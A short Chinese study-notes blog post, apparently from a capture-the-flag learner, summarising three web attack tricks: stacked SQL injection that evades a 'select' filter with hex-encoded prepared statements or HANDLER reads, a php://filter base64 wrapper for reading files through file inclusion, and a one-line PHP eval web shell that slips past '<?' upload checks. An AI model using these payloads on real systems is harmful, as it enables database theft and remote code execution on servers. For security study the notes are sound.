学习小结8.25

1.堆叠注入能够到列,再要出详细的数据需要构造select语句,如果select被正则匹配拦下,考虑使用

';set@a=16进制编码的查询语句(例如:select * from 表名);prepare execsql from @a;execute execsql;--+

或者

';handler 表名 open as a;handler a read next;--+

2.文件包含中的文件隐藏的flag,使用伪协议做包含

php://filter/convert.base64-encode/resource=文件名

3.文件上传对于<?的检测

可以使用<script language="php">eval($_POST'a')</script>绕过

相关推荐
俏皮小混子3 小时前
山东大学软件学院项目实训-创新实训-计科智伴(五)——个人博客(从接口对接到边界问题修复的完整记录)
笔记·学习·状态模式·山东大学
AugustRed3 小时前
Flyway 数据库版本迁移 零基础完整学习文档
数据库·学习
我的xiaodoujiao3 小时前
API 接口自动化测试详细图文教程学习系列23--结合Pytest框架使用4-前后置处理
python·学习·测试工具·pytest
USC-XiangLuXun3 小时前
局部科技小创新是有意义的
科技·学习·生活
Upsy-Daisy3 小时前
IOTA 学习笔记(三):IOTA 的技术演进路线
笔记·学习
有个人神神叨叨4 小时前
Agent Memory 学习笔记-1.0
笔记·学习
一只肥瘫瘫4 小时前
STM32 程序升级学习笔记:Bootloader、IAP 与串口升级流程
笔记·stm32·学习
qq_571099354 小时前
学习周报四十七
学习
凉、介5 小时前
深入理解 ARMv8-A|异常/中断处理
笔记·学习·嵌入式·arm
吃好睡好便好5 小时前
矩阵的求逆运算
人工智能·学习·线性代数·matlab·矩阵